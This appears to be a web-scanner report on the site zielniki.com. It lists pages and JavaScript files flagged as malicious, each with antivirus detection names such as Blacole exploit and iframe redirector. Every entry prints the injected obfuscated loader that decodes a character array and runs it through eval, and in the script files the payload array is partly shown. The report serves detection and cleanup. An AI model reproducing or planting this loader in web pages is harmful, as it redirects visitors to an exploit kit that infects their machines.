Request | Server response | Status |
http://zielniki.com/ | 200 OK Content-Length: 4521 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=179;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array();s="";for(i=0;i-500!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/js/prototype.js | 200 OK Content-Length: 49997 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 4546 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/js/lightbox.js | 200 OK Content-Length: 22408 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/js/skrypt.js | 200 OK Content-Length: 2673 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/pl,o_mnie.php | 200 OK Content-Length: 6099 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=179;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array();s="";for(i=0;i-500!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/pl,galeria.php | 200 OK Content-Length: 10095 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=179;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array();s="";for(i=0;i-500!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/pl,kontakt.php | 200 OK Content-Length: 4988 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=179;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array();s="";for(i=0;i-500!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/./ | 200 OK Content-Length: 4521 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=179;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array();s="";for(i=0;i-500!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/./js/prototype.js | 200 OK Content-Length: 49997 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/./js/scriptaculous.js?load=effects | 200 OK Content-Length: 4546 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/./js/lightbox.js | 200 OK Content-Length: 22408 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/./js/skrypt.js | 200 OK Content-Length: 2673 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=37;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,103,108,107,102,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,101,111,110,100,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,109,10
... 926 bytes are skipped ...105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,102,112,106,101,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,103,108,107,102,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,102,112,106,101,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-488!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/./pl,o_mnie.php | 200 OK Content-Length: 6099 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=179;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array();s="";for(i=0;i-500!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|
http://zielniki.com/./pl,galeria.php | 200 OK Content-Length: 10095 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=179;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array();s="";for(i=0;i-500!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports:- AntiVir
- JS/iFrame.afu.12
- Avast
- JS:Iframe-XJ [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Trojan.JS.Agent.GO
- K7AntiVirus
- Riskware
- Comodo
- TrojWare.JS.BlacoleRef.W
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.400
- Kaspersky
- Trojan.JS.Redirector.xb
- Microsoft
- Exploit:JS/Blacole.KH
- MicroWorld-eScan
- JS:Trojan.JS.Agent.GO
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Agent.bdetht
- F-Secure
- JS:Trojan.JS.Agent.GO
- F-Prot
- JS/Blacole.DC.gen
- AVG
- HTML/Framer
- Norman
- Agent.AMAYB
- GData
- JS:Trojan.JS.Agent.GO
- Commtouch
- JS/Blacole.DC.gen
- BitDefender
- JS:Trojan.JS.Agent.GO
|